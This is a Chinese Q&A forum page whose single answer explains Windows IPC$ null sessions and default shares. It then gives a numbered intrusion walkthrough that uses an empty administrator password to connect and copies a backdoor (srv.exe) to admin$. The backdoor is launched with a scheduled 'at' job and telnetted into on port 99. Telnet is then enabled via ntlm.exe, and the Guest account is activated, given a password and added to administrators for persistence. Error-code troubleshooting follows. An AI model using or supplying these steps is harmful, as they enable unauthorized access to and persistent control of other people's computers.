全部评论(1条)
-
- 94481877 2016-05-01 16:54:36
- 这是利用ipc$空连接和默认共享入侵。 空连接和ipc$(internet process connection)是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$......)和系统目录winnt或windows(admin$)。 相关命令 建立空连接 net use \\IP\ipc$Content$nbsp;"" /user:"" (一定要注意:这一行命令中包含了3个空格) 建立非空连接 net use \\IP\ipc$Content$nbsp;"用户名" /user:"密码" (同样有3个空格) 映射默认共享 net use z: \\IP\c$Content$nbsp;"密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 删除一个ipc$连接 net use \\IP\ipc$Content$nbsp;/del 删除共享映射 net use c: /del 删除映射的c盘,其他盘类推 net use * /del 删除全部,会有提示要求按y确认 经典入侵模式 1.C:\>net use \\127.0.0.1\IPC$Content$nbsp;"" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以diyi个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe \\127.0.0.1\admin$Content$nbsp; 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3.C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4.C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 5.C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。 6.C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$Content$nbsp; 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8.C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! 9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10.C:\>net user guest /active:yes 将对方的Guest用户激活 11.C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12.C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) ipc$与空连接,139,445端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) ipc$与空连接 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). ipc$与139,445端口 ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享) ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上操作系统; 2)对方没有打开ipc$默认共享 3)对方未开启139或445端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows 无法找到网络路径 : 网络有问题; 错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连
-
赞(12)
回复(0)
热门问答
- 怎样利用系统默认共享入侵
2016-04-30 22:04:28
369
1
- 怎样禁止ipc$默认共享?
2013-12-05 02:23:20
394
2
- 如何防止XP系统中的IPC$共享入侵!!!
- 如题
2013-10-18 00:06:00
393
1
- 如何打开ipc$默认共享?
- 我的机子是2000的。
2016-01-21 03:03:30
431
1
- 如何开启IPC$默认共享
2016-12-05 06:38:28
402
1
- 如何添加默认共享和删除IPC$共享
- 如题
2006-07-20 23:44:27
344
2
- 如何关闭XP系统的默认共享和IPC$共
2018-01-16 16:46:55
410
1
- 局域网如何使用IPC$访问默认共享
- 如题,在我的局域网里访问不了对方机器的默认共享。请问怎样才能访问?分为知道对方机器的账号密码和不知道对方机器的账号密码,请分别说明具体步骤和命令。
2014-02-20 06:03:35
383
1
- 如何关闭win7 IPC$的默认共享
2013-01-23 01:30:49
410
2
- 怎么关掉win 2003的ipc共享和默认共享?拜托了各位 谢谢
- 怎么关掉win 2003的ipc$共享和默认共享?我关了又会重新开启,!~郁闷,停止server服务是可以关了,可是每次启动系统时,就会弹出一个错误窗口!~如何才可以关了?
2015-01-25 02:19:17
367
2
- 视频监控系统怎么入侵
2012-10-31 22:41:13
384
2
- 做IPC共享入侵实验提示67错误怎么解决
- ping到目标windows20000主机是ping的通的然后我用net use \\目标ip\ipc$ "111" /user:"Administrator"命令尝试进行连接提示67错误 找不到网络名 ipc$不是默认开启的么
2013-06-06 02:54:05
388
1
- 如何判断对方计算机是否开放IPC$默认共享服务?
2012-09-17 11:56:55
398
4
- 利用IPC$通道入侵现在还能用么?
- 试着通过IPC$入侵过一段时间,总是出现各种错误,不论在局域网还是宽带。扫描不到139开着的机器,或者得到用户名密码后不能连接等。。有些不知所措了
2010-06-22 21:38:44
359
2
- 去掉IPC$的默认共享好吗?对电脑有什么影响?
2014-10-15 04:18:13
363
2
- 视频监控怎样实现共享
- 视频监控怎样实现共享一个居民点安装了监控,怎样实现每一家都可以查看实时监控,和监控回放。... 视频监控怎样实现共享一个居民点安装了监控,怎样实现每一家都可以查看实时监控,和监控回放。 展开
2018-12-04 12:44:30
217
0
- 怎样利用arm实现机器视觉系统中的功能
2018-11-24 02:05:56
295
0
- 我的电脑ADMIN$ IPC$ C$ D$ E$ F$默认共享可以取消吗?
- 害怕对电脑有所影响啊?不知是否可以取消默认共享啊?
2013-11-16 23:17:36
320
1
5月突出贡献榜
推荐主页
最新话题
-
- #激光粒度仪 #
- 电压击穿试验仪:藏在实验室里的“闪电制造者”...电压击穿试验仪:藏在实验室里的“闪电制造者”硬核真相:这台设备能在几秒内让绝缘材料“原地爆炸”!通过模拟极端高压环境(可达300kV以上),它用一道闪电般的电弧,揭穿材料绝缘性能的极限。魔鬼测试流程:温柔起步:以100V/s缓慢升压死亡凝视:实时监测微小漏电流致命一击:在击穿瞬间记录峰值电压(整个过程比科幻大片更刺激)安全玄机:• 防爆油箱:把击穿爆炸锁在40mm钢化玻璃后• 幽灵电压消除:放电后自动归零,防残余电击• 智能逃逸:检测到有毒气体自动启动排风反常识现象:某些纳米复合材料被击穿后会“自愈合”干燥空气的击穿电压≈3kV/mm,但SF₆气体可达89kV/mm
- 市场中的检测zeta电位的一种技术叫CF-P...市场中的检测zeta电位的一种技术叫CF-PALS,他是真的相位分析光散射吗?这种余弦拟合位相分析法,为什么叫"位相",而不是传统的“相位"?
参与评论
登录后参与评论